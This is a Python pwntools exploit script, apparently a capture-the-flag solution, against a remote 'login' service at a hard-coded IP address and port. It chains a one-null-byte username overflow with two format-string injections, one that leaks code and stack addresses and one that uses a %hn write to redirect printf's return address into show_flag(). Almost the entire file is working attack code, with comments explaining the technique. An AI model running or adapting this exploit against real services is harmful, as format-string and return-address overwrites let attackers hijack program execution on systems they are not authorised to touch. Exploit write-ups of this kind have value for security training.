#!/usr/bin/env python
import struct
import sys

from pwn import *  # pip install pwntools
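# Exploit for the remote "login" service: a 256-byte username write (the
# original notes a one-null-byte overflow there) followed by two format-string
# injections through the login prompt -- one to leak addresses, one to redirect
# printf()'s return address into show_flag().
#
# Every offset below was recovered for one specific remote build; against any
# other binary they must be re-derived.  Only run this against infrastructure
# you are authorised to test.
HOST = '202.112.26.107'
PORT = 10910
CODE_LEAK_OFFSET = 0x1490   # first leaked value (%lx) minus the program base
STACK_LEAK_OFFSET = 528     # second leaked value (%48$lx) minus the start of our buffer
RET_SLOT_OFFSET = 24        # printf()'s return-address slot sits this far below the buffer
SHOW_FLAG_OFFSET = 0xFB3    # show_flag() relative to the program base
FMT_PTR_ARG = 10            # positional printf argument that reads our pointer
FMT_PAD = 16                # prefix is padded to this length so the pointer lands on FMT_PTR_ARG


def parse_leak(data):
    """Turn the leak-stage output into ``(code_base, printf_return_slot)``.

    ``data`` is everything the service printed after the ``%lx %48$lx ``
    username was submitted, up to and including ``login failed.``; its first
    two whitespace-separated tokens are taken as the two leaked hex values.

    Raises ValueError when fewer than two tokens are present (the service did
    not echo the format string) instead of an opaque IndexError.
    """
    tokens = data.split()
    if len(tokens) < 2:
        raise ValueError('expected two leaked values, got %r' % (data,))
    code_base = int(tokens[0], 16) - CODE_LEAK_OFFSET
    buf = int(tokens[1], 16) - STACK_LEAK_OFFSET
    return code_base, buf - RET_SLOT_OFFSET


def fmt_write_lo16(value, where):
    """Build the format string that writes ``value & 0xffff`` to ``*where``.

    ``%<n>c`` pads the output to n characters and ``%<FMT_PTR_ARG>$hn`` then
    stores that count as a 16-bit write through the pointer placed right after
    the padded prefix.  A zero low half is written with a bare ``%<arg>$hn``
    (no preceding output), because ``%0c`` would still emit one character.
    Returns bytes so it behaves the same under Python 2 and Python 3 pwntools.
    """
    lo = value & 0xffff
    if lo:
        spec = '%%%dc%%%d$hn' % (lo, FMT_PTR_ARG)
    else:
        spec = '%%%d$hn' % FMT_PTR_ARG
    return spec.ljust(FMT_PAD).encode() + struct.pack('<Q', where)


def main(argv):
    """Run the exploit against HOST:PORT, overridable as ``argv[0]``/``argv[1]``.

    The socket is always closed, even when a stage fails part-way.
    """
    host = argv[0] if len(argv) > 0 else HOST
    port = int(argv[1]) if len(argv) > 1 else PORT
    r = remote(host, port)
    try:
        # Stage 1: log in as guest, set a 256-byte username via menu option 2,
        # then option 4 (presumably logout) to get back to the login prompt.
        # The original calls this the one-null-byte overflow; the terminator
        # apparently lands past the buffer so that later logins are echoed
        # through printf() -- unverified here.
        r.recvuntil(b'Login: ')
        r.send(b'guest\n')
        r.recvuntil(b'Password: ')
        r.send(b'guest123\n')
        r.recvuntil(b'Your choice: ')
        r.send(b'2\n')
        r.recvuntil(b'Enter your new username:\n')
        r.send(b'A' * 256 + b'\n')
        r.recvuntil(b'Your choice: ')
        r.send(b'4\n')

        # Stage 2: format-string read -- leak a text pointer and a stack
        # pointer from the failed-login echo.
        r.recvuntil(b'Login: ')
        r.send(b'%lx %48$lx \n')
        r.recvuntil(b'Password: ')
        r.send(b'\n')
        code_base, retaddr = parse_leak(r.recvuntil(b'login failed.'))
        print('bin = %#x' % code_base)
        print('printf_ret@stack = %#x' % retaddr)

        # Stage 3: format-string write -- only the low 16 bits of the return
        # address differ, so a single %hn is enough.
        show_flag = code_base + SHOW_FLAG_OFFSET
        payload = fmt_write_lo16(show_flag, retaddr)
        r.recvuntil(b'Login: ')
        r.send(payload + b'\n')
        r.recvuntil(b'Password: ')
        r.send(b'\n')
        # The %c padding echoes up to 64K characters first; skip them by
        # waiting for the pointer bytes.  Only 6 of the 8 are matched --
        # presumably the top two bytes of the address are zero and end the
        # echoed C string.
        r.recvuntil(struct.pack('<Q', retaddr)[:6])
        # The flag follows on the same line.
        print(r.recvuntil(b'\n').decode('latin-1'))
    finally:
        r.close()


if __name__ == '__main__':
    main(sys.argv[1:])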